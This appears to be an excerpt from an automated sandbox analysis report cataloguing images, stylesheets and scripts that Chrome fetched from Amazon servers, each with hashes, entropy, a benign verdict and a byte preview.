                                                                                                                                                                                                        SHA-512:138C5F8FB713D26BB38794534036095805C96BD436511CAC41DB06F678EBAED5F51D754B599D482067A21E3599767E9894633D94C66311C71528021AF3B6A4F1
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        URL:https://m.media-amazon.com/images/I/61931GDnYxL._AC_SY200_.jpg
                                                                                                                                                                                                        Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*..........."...............................................................!..1.AQa"q....2BR....#3Cbr....4st...5Sd..%c....$U.....................................................!1..aq"2A..$3...BQr.............?..x.....].,.............(..^...U.U.9s.....K.....b.En..V>;.0...4n..$..C..f..0..7Bl...I.....b=v_..]...W...'.....k".....c.79....L...1.JM....0..........].#..>..p..z.......!..=.......M$H.zI.......uZ=...O.8...?.1...I.~V.......V.x....9.yg...{......._..@..k].[...7....;.\.w..V.....?58....C.....].w.j...........J.].J..[p./..O....g>.WQ.=-$j .......pz.vqni.z[.....eN.......b..*..'..kt,...Z.....=z......_.......n..E.<l4.[...._o?,ln.........S..-g.~OOHB...2...{I.>.....&.....q.38..O......xh_..E...~.4hQH..nK.7..o.7.;......N<...-.k.Z..r..+..\...[..,r.M/s....w........g...5...............B.]L.*;..jo%..Z.C1Rl...N.U<.yZ...N98
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:ASCII text, with very long lines (15883), with no line terminators
                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                        Size (bytes):15883
                                                                                                                                                                                                        Entropy (8bit):4.901829863926774
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:192:RXEjfJ4dNiLKFshoU7TDNxEc1OfYXk8XbG6xYG5ZencqNL/VEM7TreVI1Ap8fq:o4iL9n7pQeRLTencqhNNeeAp8fq
                                                                                                                                                                                                        MD5:3F78E373FF777316A021C60712907B45
                                                                                                                                                                                                        SHA1:1B3184C560BA2A7CC8AED2500D71362102E0CCF6
                                                                                                                                                                                                        SHA-256:B36C857C120194B76B37C9B5FF02039B4AF3654BD304EEEE8EF981EC4A89A2E2
                                                                                                                                                                                                        SHA-512:87066284A8BFB6F1A3C4F4DBB9201F160F0183DB460A165A8E13886B4E0E5270BE6946327FD5521877A77790C38B3032EAA1363687FC3D880FD133ADC6965F50
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        URL:https://images-eu.ssl-images-amazon.com/images/I/31Mo71Q-kFL.css?AUIClients/CartD12nAssets
                                                                                                                                                                                                        Preview:.dibs-ambiguous-item-info{position:relative}.dibs-ambiguous-item-label{margin-right:250px}.a-mobile .dibs-ambiguous-item-label{margin-right:0}.dibs-ambiguous-item-metadata{position:absolute;top:0;right:0;text-align:right;width:250px}.a-mobile .dibs-ambiguous-item-metadata{position:relative;text-align:left;width:auto}.dibs-spinner{position:absolute;z-index:1000}.dibs-secondary-view-status{position:fixed;top:50%;left:50%;width:100%;height:100%;z-index:100000;transform:translate(-50%,-50%);background-color:#fff;opacity:.85;background-size:cover;padding:0;margin:0;display:none}.dibs-secondary-view-status i{vertical-align:middle}.dibs-secondary-view-status-text{position:fixed;top:45%;left:50%;transform:translate(-50%,-50%)}.a-popover-loading-wrapper{position:absolute;left:50%;top:50%;margin-left:-64px;margin-top:-32px}.a-mobile .a-carousel-container.dibs-shoveler{margin:0}.dibs-shoveler-no-results div.a-carousel-left,.dibs-shoveler-no-results div.a-carousel-right{visibility:hidden}.dibs-sho
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:GIF image data, version 89a, 1 x 1
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):43
                                                                                                                                                                                                        Entropy (8bit):2.9889835948335506
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:3:CUXPQD/lHpse:1Qvse
                                                                                                                                                                                                        MD5:E68CC604CAB69BF03B8CD228D940F5EF
                                                                                                                                                                                                        SHA1:15C0C62C4C7C917B5DD82A8E1E439211A44B9E98
                                                                                                                                                                                                        SHA-256:A3A64AEA2E96EC58A163DDB8D4CF86CF236178ED2D225B8F44154BC1B010DDCE
                                                                                                                                                                                                        SHA-512:E250128E5EBE1384113C834409BEFB9CD0728B68EF07AB3450CB0A11F64A8AE9B29C48695DB73D0E4BBA0FD976BDCC24BEEA0F326FAD1B4CA072BCCE6E24E3A5
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        Preview:GIF89a.............!.......,...........L..;
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:ASCII text, with very long lines (586)
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):23071
                                                                                                                                                                                                        Entropy (8bit):5.361962438493604
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:384:/y2yQbKsU21yv1Dkd/boShcX4l35wG0oVEnHc5gCACPjNiFQ/2CW+LjdzO7hdV8s:/y2yQbKsU21Wkd/0ShcX4/wposHc5gDh
                                                                                                                                                                                                        MD5:1BDE5B3DD51828A3402C2B8ABE060D36
                                                                                                                                                                                                        SHA1:FEB7A3F43C163FA54E64778B1A2C0ABCEF5CBE61
                                                                                                                                                                                                        SHA-256:7646470956F34BA35FFAF15E1FC05D8E277EB4A5595C101C3140404FF708A307
                                                                                                                                                                                                        SHA-512:7E404B53CB49305525B1EF63A7CFF19A3FCE64997D2937F9EDEA777B8017616F493EDA444D1072CF4B03147AA6411EB491B957515263057B0C413C4583390E54
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        Preview:P.register("cvfVersion",function(){return{version:"0.1.0.0-2024-08-11"}});"use strict";.P.when("A","cvfFormDataGenerator","cvf-client-side-counters-util","ready").register("cvf-account-switcher",function(b,k,a){function n(a,d){a.preventDefault();var c=k.retrieveFormData(a.target),h=c.inputData.serializeArray();h.push(e(a.target));b.ajax(window.location.protocol+"//"+window.location.host+c.requestPath,{method:"POST",params:h,success:d,error:f})}function e(a){a=h(a);var b=a.attr("name");b||(b=a.closest(".cvf-account-switcher-sign-out-link").attr("data-name"));var d=a.attr("value");d||.(d=a.closest(".cvf-account-switcher-sign-out-link").attr("data-value"));return{name:b,value:d}}function f(a,d,c){b.trigger(p.error,c)}function c(a){var b=/([^@\s]+)@([a-zA-Z0-9_-]+)(\.[a-zA-Z0-9._-]+)/ig.exec(a);if(null!==b){a=b[1];a=h.trim(a);var d=a.length;if(1!==d){for(var c=a.charAt(0),e=0;e<d-2;e++)c+="*";a=c+=a.charAt(d-1)}a+="@";c=b[2];c=h.trim(c);d=c.length;c=c.charAt(0);for(e=0;e<d-1;e++)c+="*";ret
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 240x220, components 3
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):3410
                                                                                                                                                                                                        Entropy (8bit):7.619193594074733
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:48:TT0woVXYqDnuE31/pQ0buynj4C83HGA1ym07lfZaQm7ErWGqRCDuGB5z:TboVdy4BQ1eJ83B1ym8fNdrWBRCayz
                                                                                                                                                                                                        MD5:7E787FAF1EB722AD0DA17F9A6F33A0B5
                                                                                                                                                                                                        SHA1:E1E7576526CA7B6E2F6C1E652322E17633055192
                                                                                                                                                                                                        SHA-256:0B0DEC14A9777B5377EB99C6B2B4CDF3B15DEFCE1267513F5B1F505AFCE2F936
                                                                                                                                                                                                        SHA-512:777230B55EE93D0D3A8A14FF038F5074488D8ED7D6A2FFB8141602668409C3D273D51DF50B453BF2882CB50609F6A65883F370F581EAA2A583B775646091E8E9
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*..........."..........4.................................................................`.......................................u...F!'Q.I.b.u...F!'Q.I.b......!.7.Q.7/..tsm...^e......M..C.M".|..y...a..5..g.j}..t..2.T].....1.\.?....p...7..X.........h[U...`..^U.\.L...=Zu,4.|.k.<I..R......9.@..7...J/..2....X..^..v.;n|.3...g........_i.M...Y...*......w.zG-.?#.._Iy....Jt..r..h..E....9.k`.c.7.it...m...g..B........7U.J....*..k+!....:.............)7.hT.5.y.D.W-..<.......&F..`.'.5....m...L.....1Q#...O.1..c1..v=3#..t...................................................*.............................014.. !A2p#............X.qX..3.l.6.sl.6.sl.6.sl.6.sl.6.sl.6.sl.6.sl.6.a.U.:.C.KW.Wo..D%.?.PR).S.]9..d....@m..M.F.#G....**.:..NX.b.*..>...s9.[.....:.....%.lX....M._.....T._...1.....U.^!....#.....}}.u.ovT...b9.{d.{$../..
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 169x200, components 3
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):10646
                                                                                                                                                                                                        Entropy (8bit):7.966291895163884
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:192:HVExuZ0i0mXAJ1PG+/EO5HBEqnc36GU1kNjq9yDpNPQoCIyhpiuCNPcr:HOkZb0rrG+/FHvFkNjq9wPubhpidNPcr
                                                                                                                                                                                                        MD5:FA53D11D0892F1BE317043946364761E
                                                                                                                                                                                                        SHA1:259195C31C3CEC9106D776C16D2B6B2D770C5815
                                                                                                                                                                                                        SHA-256:9BD25DF8CA0BCB9CBFB2E82CC1894F7293DA153360071B7FDF40DCFE50B3EC90
                                                                                                                                                                                                        SHA-512:27EA7155A326089F47AFABF201104F6D423C8170A7A8D86947B55FDC09C61FEA21CDEE02EA74D959C9C4397684BE766C91B07C03C489DF4F01C9D619CC46D524
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*..........."................................................................!1..AQ."q.#25Bast.....Rr&34Db.....6c...$C...S.....................................................!1..."3AQaq..#CR...r.4B...............?..t.R..^\..2....3..s..8...B..._..i...|..M?.a.?CGE}G....V........K.4.b.......#..@..*.../........E...7...._.e..$........4.q.Z.x...9MT7..c.f..44..T..xKT.....hRTb...$..s...3....c............3.a.*.....Y.<./.].k.E.];\.%.6].A,..3!..T.(y..r(...^@..E'3.....5").s.v..jA..`...x....{V.{..u.4.....;g..".:..]h...d....y .....`F.R&`..q....u.$.G....I..("..!..].**...}.....'<o.p.9.I.-.'z..N.c..S...WK..C.B...[zE..Ispb...<..6. ..........."...HY.s...X.e.:..I...C..8S.&=.]....G.g..A^?...Kj....2-..V....g.........>.jq..=...7.U......e...A.{QM5M..,..N.ol...&...p.[...{g.|L.....n.[}.../g<;/]2.{!T.......m.....t..V.../.|...>.
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 186x116, components 3
                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                        Size (bytes):5643
                                                                                                                                                                                                        Entropy (8bit):7.864358643933752
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:96:72+xCzZeYanEyL8iJJIBIkGuqP5RzZwEnKpetcpXReNjK3GFt36A64NZJuum4:7BxCYY6RJI6u05TznKUtnNOW7qGs4
                                                                                                                                                                                                        MD5:1B495C1094AA339C163BE7E7F972372E
                                                                                                                                                                                                        SHA1:C50629D2B9A4A520AA0DAA96FBFB882E50F11497
                                                                                                                                                                                                        SHA-256:BB6ED509542D9A6EDE5BF7B1BADDF3E203698283E836F2819ED1108AFF750989
                                                                                                                                                                                                        SHA-512:671683DFD700F7A506562FD99014A42BAE189F656236DBAFDD70E0229CA8C85829078141CE10D9727DFC76CAC01903650A065286069900D62F0B039021D5E03C
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        URL:https://images-eu.ssl-images-amazon.com/images/G/39/AE-hq/2023/img/Consumer_Electronics/XCM_CUTTLE_1615980_3334873_186x116_1X_en_AE_2._SY116_CB597773556_.jpg
                                                                                                                                                                                                        Preview:......JFIF......................................................................................................................................................t...."..........9.........................................................................7............~....WT{eW..N1...E.}..H.P.........=..J......0...i........}..T....P1........a.5......."t.`.Nr..z.v......y...Z(.......).]..$.l.Q"...v....+y...5.`6(.......tj~.S...y.+...]3E....O.b-...D..q.G...2`m.J.u..:f...;..:....==._....u.f...j..k.^..."2....UXf@.SG2^.Qg.. .....].%t.&nG`.......p...'...y.@..-.K....*......V....~.}i.................R..........................!1A....Qa...%045q......"$6D#&RTUe.2BPbu... (@EFdv.............?.....0.[.v.....$\\_..v......L......u.}..v.g.)UH..s...9..?k.f.d52..i.H.s$......,.n|.QH....N........U.../*..8JU.N.......:._.ak8.."P9T........T..;..f..*.4.LY(......p.....[M;pk...+..jBp.#v.._.$.G..K....U.D......G.JhE'.._h|q@.;TRz.3`.5.....'xI.."......O...H........n..V.V..>.".u.....CI..}..
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:JPEG image data, Exif standard: [TIFF image data, little-endian, direntries=0], progressive, precision 8, 186x116, components 3
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):4406
                                                                                                                                                                                                        Entropy (8bit):7.708118239255408
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:96:R9OEXNkccDp0ks1wetNPNGCn+JLySBRbTbriM8hPMm/Laqjy:rQDvABtNFc3TbrUhPxWqW
                                                                                                                                                                                                        MD5:17CCA7168F2A2CD730390E9BE166250A
                                                                                                                                                                                                        SHA1:AA654D6E37A7D776DB85093F7EC4845B6DE1C7BB
                                                                                                                                                                                                        SHA-256:3C90972F1C2C388F93EAD7D80A517F9C87DF00692ABC29CCE7AF62880AEABE3A
                                                                                                                                                                                                        SHA-512:01C23E69EF968D67F20B25C90DF8F7C7317AC2A444E1863EA9ECA81238A8911FE1BD1041E2D8BF10854DD8AC9B29DBA054E69E592C334D29804A324DEE250BC4
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        Preview:......Exif..II*.................Ducky.......(......http://ns.adobe.com/xap/1.0/.<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 9.1-c002 79.a6a63968a, 2024/03/06-11:52:05 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmpMM:DocumentID="xmp.did:6C265638478A11EFBAE58FF32B0F82A0" xmpMM:InstanceID="xmp.iid:6C265637478A11EFBAE58FF32B0F82A0" xmp:CreatorTool="Adobe Photoshop 2024 Macintosh"> <xmpMM:DerivedFrom stRef:instanceID="CE6620C76A0D1BC9846AF38E4B94797E" stRef:documentID="CE6620C76A0D1BC9846AF38E4B94797E"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>...!Adobe.d.......................4................................................$$''$$53335;;;;;;;;;;.............................%......% #...# ((%%
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 250x148, components 3
                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                        Size (bytes):2285
                                                                                                                                                                                                        Entropy (8bit):7.583569868246524
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:48:TT0ry2fWYw8YBLkISVbEmTE6H5HamgJhwsZJlhfPozJRKG:TN+WfGlTD0mgJhDzPwJRV
                                                                                                                                                                                                        MD5:1F896DB56D2AD7C475317B2B3D13BEEA
                                                                                                                                                                                                        SHA1:C3FD0EF552AECF262D20499E63DDE844B3DB59FE
                                                                                                                                                                                                        SHA-256:6FCD57FFF87BA7A1851C2E4400F81FB230A3F6964AB7AF5C2FC7B5DA74005D93
                                                                                                                                                                                                        SHA-512:DE6DE3440F828B0E5D11CE47F23E1F6A2F14D48BD82596D7508181442F46BEB71C818BBA6167039F8247CC821365D7D282FE6C3CBC1C14FA764509F2171E7726
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        URL:https://m.media-amazon.com/images/I/21cxge8YxxL.AC_SX250.jpg
                                                                                                                                                                                                        Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*..........."..........w..................................................!1.Q.2Aaq."#BR.....r..3Cb......................................................?..................U....ZX.k...:.{..1.l.............K.v*...ZA9w.c...W.....?6J.mO.V..tt..rjc..'.Nm.v^..To\..W`up..&...>.~..B.j+...Q...r...NN/...z.5G..ch....}.E.....&.....`......................QW..~f....Z6...9}.....ic.-..tU.{..7y.?....\..c..h.../=.L..i.>r|B..J...H..9.wgD.T..$R."..D.[E......X.5....-....<.[q...X...x......I&....p...gxI......N.).......@.P.S...&d.....!<}(h..tu..kT...J....~.n.K.J...QW..W..z..7?.u..jx..z%..../..4.kQ..mW.U.........E..3c.H........9.s..R).9..@k..i...05.S-..(l.2.M..0".S2.T......$..0]+.KJ..\.O!).8\.|g........&s..YBv|....L...T.'9..W..).j....ZUcF.S...ZW......].x..-...X.....:.q..&z.........r..U..lE.qjiJ-4.V.0 a.h....,.A".i.+...FT...h
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 480x440, components 3
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):8677
                                                                                                                                                                                                        Entropy (8bit):7.717146020883101
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:192:08pOuWYM7w8AaRycmIQVA41bUNdR6+G7T8ymeQfvwPQ1pDIqfGz:0pLTxysQx1bU7RfQ91Qfv+O7c
                                                                                                                                                                                                        MD5:796E8C860DC13DABF58CE3E58AF179D4
                                                                                                                                                                                                        SHA1:8A4AC87DE1AC6A3D77093A5EECE8941AFF28943C
                                                                                                                                                                                                        SHA-256:A77055459F97AFC06CF08380FDE172CC195A9A9DB6F19065B3B275799D4265B7
                                                                                                                                                                                                        SHA-512:3C61770CDAAA3DE913F84CE43AAF5FBD06F8628034E1C925BF0030D119DEEBB3E0DE430D799F0A689066B7BE458AF07CA5DB8CEE0D2A9D577B499EFF5CC1C6A9
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*..........."..........0.............................................................,............................................................AP....................E......d...p..2.......................l.qye._....V..2O..-..@...............k['.......}R..Q...p..g..\.....wh.................~.........l..Z......(.}S...Q...5.................-.0y.........3l=.|.v.........3f..................8..s;..A.......n.9.}.V..\.&..o%................`j.Q...p.../......iZA..=....K..8.m..F..................:g.;^..q..W..f..~O.H.9....'v.....I.DIT.......................{.....T&.ek&.........`.c....d.................B!.z.P.(R..Lj..&4..zi..i.@.X-....J................>e.l.....R.)3..M;......%K.@...Hmp.evX.P..............R.G..|q...<..'-..=....b.t._o'....................:..&..v.()Z..\.b...A...._.ok:..t.3{.`..................'.
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:ASCII text, with very long lines (24182), with no line terminators
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):24182
                                                                                                                                                                                                        Entropy (8bit):5.315032386425423
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:192:Tvn/4G//y4q6IDB5yqO7RH3+o1EXt/CHoOP28BOzJjTbhYcG9LN1VV1XrLcMu3i1:T3XxL1awZgzJbhTGtZcMLzZ6gD23Uj
                                                                                                                                                                                                        MD5:1D6DBC0AA536245BD1B35B964F94E01A
                                                                                                                                                                                                        SHA1:A428BBA0D959C3D78F7DFE6307C5EDE5F1D8AA54
                                                                                                                                                                                                        SHA-256:38D0C94882C0FA40B0030F9564BAE92D902F657DFB954CFA6B53B1BFA083ECFE
                                                                                                                                                                                                        SHA-512:10E0D7982B54660203A46C5DF1B3DAB2C6EE6E379BE9903B11DDAA3ADA92DA355FC8C182B9D742AC5F4DBC71812891798D3F28028746D820A16016A1073E60F5
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        Preview:var Creative=function(t){var e={};function n(r){if(e[r])return e[r].exports;var o=e[r]={i:r,l:!1,exports:{}};return t[r].call(o.exports,o,o.exports,n),o.l=!0,o.exports}return n.m=t,n.c=e,n.d=function(t,e,r){n.o(t,e)||Object.defineProperty(t,e,{configurable:!1,enumerable:!0,get:r})},n.r=function(t){Object.defineProperty(t,"__esModule",{value:!0})},n.n=function(t){var e=t&&t.__esModule?function(){return t.default}:function(){return t};return n.d(e,"a",e),e},n.o=function(t,e){return Object.prototype.hasOwnProperty.call(t,e)},n.p="",n(n.s=77)}([function(t,e,n){"use strict";n.r(e);var r="undefined"!=typeof MSFClient&&MSFClient;e.default=r},function(t,e,n){"use strict";var r=n(0),o="undefined"!=typeof navigator&&navigator,i=r.default&&r.default.getUserAgentInfo()||o&&o.userAgent;e.a=i},function(t,e,n){"use strict";n.r(e);var r=n(0),o=n(7),i=function(){if(r.default){var t=r.default.getDocumentCookie();return/\"av\":\"([.\d]*)\"/i.test(Object(o.a)(t,"amzn-app-ctxt"))}return!1}();e.default=i},f
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 145x116, components 3
                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                        Size (bytes):3783
                                                                                                                                                                                                        Entropy (8bit):7.892597719362774
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:96:TgfIdu08P9yj70Rp8i+jxwJTDAJbeXaLrkerYVtI3DJURa:xdg8jq+t2X6b5rYVtsJURa
                                                                                                                                                                                                        MD5:479684630CACC4A318DB9991B11BE386
                                                                                                                                                                                                        SHA1:8A290D73EEBB2164B6CCDA03A05CE5F218AE8172
                                                                                                                                                                                                        SHA-256:537C0F8FFE5BB82F4F291B491DC57C5316EAD76088AC3DEF116B08957BF763E3
                                                                                                                                                                                                        SHA-512:702287AECFEEA7DB21AC5C6079C047D1AFB6F8FE6B5FC1BFBDE9E2296581B5CB8097C4D458FCDF9CC71DF2D27F3411819DE518D7C69C4794E6FC1D526B8CFA1F
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        URL:https://images-eu.ssl-images-amazon.com/images/G/39/kitchen/janiceo/april_new_dqc/xcm_banners_bau_2021_desktop-quadcard_b077n51cr2_379x304_ae-en._SY116_CB623271922_.jpg
                                                                                                                                                                                                        Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*......t...."..............................................................!..1.2Qa"Aq.....Br..RSb...#3CDT.....Uc.....................................................!."A1.............?..-z....b..I.......j.$U..q..{..,.$.n.....U......z.@.#....*.....iy...."7pyS.uV.jn.^E-..p>F.Z#]B./...rv....Z...{....F..|G....*fF>5.6......r b...N...>..?..%*.EG...d..&A...i.g.....4$......I.......u_.....h*..W........u..j....b....H.j<.@.G*..E...)....~.u_Q..j..q....5....].W_.#/..;.$..fo....W._G!..P...X.>..I..7...r......-.x>..p*1.P..*...V......Sy....u......K.......^.......E.t......u.k.kz].....M..+..H.g.H.!..k.......!....].u.=............N...o..*.Tm.p).d...Ed$.....*...X'.....CR.98F+.$.}../;..v._%4.J.eP..%.....s..3.k=GJ...3'.;...Gj....[..n.{B..p@.Z............R.)....*.P.?..q.D%.z...R>.n{...Fd.....U.b.".8.N.@.S.v.E..B.b.x.>x.&.
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                        Size (bytes):136113
                                                                                                                                                                                                        Entropy (8bit):5.029096452511242
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:3072:JHqjC0oOo3pouSXmkglKEKajAQlkEXZKF4R8JA5El12ef1LL:JHqjC0oNgLL
                                                                                                                                                                                                        MD5:B037CE89F289D2AE00FC5F27A533FB30
                                                                                                                                                                                                        SHA1:6CAB1C574B2C2544EB3F32F7AED023F442A61C75
                                                                                                                                                                                                        SHA-256:65E3BA66DF0C9C45A17AC62283069D21D5E4A473D649A1D574A562A44F9A09C3
                                                                                                                                                                                                        SHA-512:949FAB51819FBEBF8F00382CF5F529D10BDD0DA703B72EEBF03737C7A94D523B90B4A9F6257154A5EED9E84B476D6B9494E9DFCC800EE163C90C8B76BC4FA1B8
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        URL:"https://images-eu.ssl-images-amazon.com/images/I/61A6IErPNXL._RC%7C11Fd9tJOdtL.css,11tfezETfFL.css,31Q3id-QR0L.css,31U9HrBLKmL.css_.css?AUIClients/AmazonUI"
                                                                                                                                                                                                        Preview:*{-moz-box-sizing:border-box;-webkit-box-sizing:border-box;box-sizing:border-box}body{min-height:100%}article,aside,details,figcaption,figure,footer,header,hgroup,nav,section{display:block}audio,canvas,video{display:inline-block}audio:not([controls]){display:none}html{font-size:100%;-webkit-text-size-adjust:100%}pre{margin:0}a:focus{outline:thin dotted #333;outline:5px auto -webkit-focus-ring-color;outline-offset:-2px}a:active,a:hover{outline:0}sub,sup{position:relative;font-size:75%;line-height:0;vertical-align:baseline}sup{top:-.5em}sub{bottom:-.25em}abbr{border-bottom:0 none}img{max-width:100%;border:0}button,input,select,textarea{margin:0;font-size:100%;vertical-align:middle}button,input{line-height:normal}button::-moz-focus-inner,input::-moz-focus-inner{padding:0;border:0}button,input[type=button],input[type=reset],input[type=submit]{cursor:pointer;-webkit-appearance:button}input[type=search]{-webkit-appearance:textfield}input[type=search]::-webkit-search-cancel-button,input[type=
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 145x116, components 3
                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                        Size (bytes):3683
                                                                                                                                                                                                        Entropy (8bit):7.885143961741562
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:96:Tu95NlWq9w4RbZluU6BUlTpUIFSK+6vzja:C95NIq9wOUU6OlXx+szW
                                                                                                                                                                                                        MD5:5D696105C36B598568169C5C4B725C64
                                                                                                                                                                                                        SHA1:0C7129A666167A62B944445F5C702952353A9303
                                                                                                                                                                                                        SHA-256:241AF2152C537513CB097AA493D36E1D764011E35C28C5D35FA15B1B7530A7C2
                                                                                                                                                                                                        SHA-512:0EE2CEAF6A6F5C79729A115F9F8D44FB6C4D7E8FBAD5407B109F6FED1E3FBCEBADB8EA3F63781AF71EAD3D788200DB9DB961A9F33938C6DF54550E8CA44A9841
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        URL:https://images-eu.ssl-images-amazon.com/images/G/39/kitchen/janiceo/april_new_dqc/xcm_banners_bau_2021_desktop-quadcard_b09774kt11_379x304_ae-en._SY116_CB623005781_.jpg
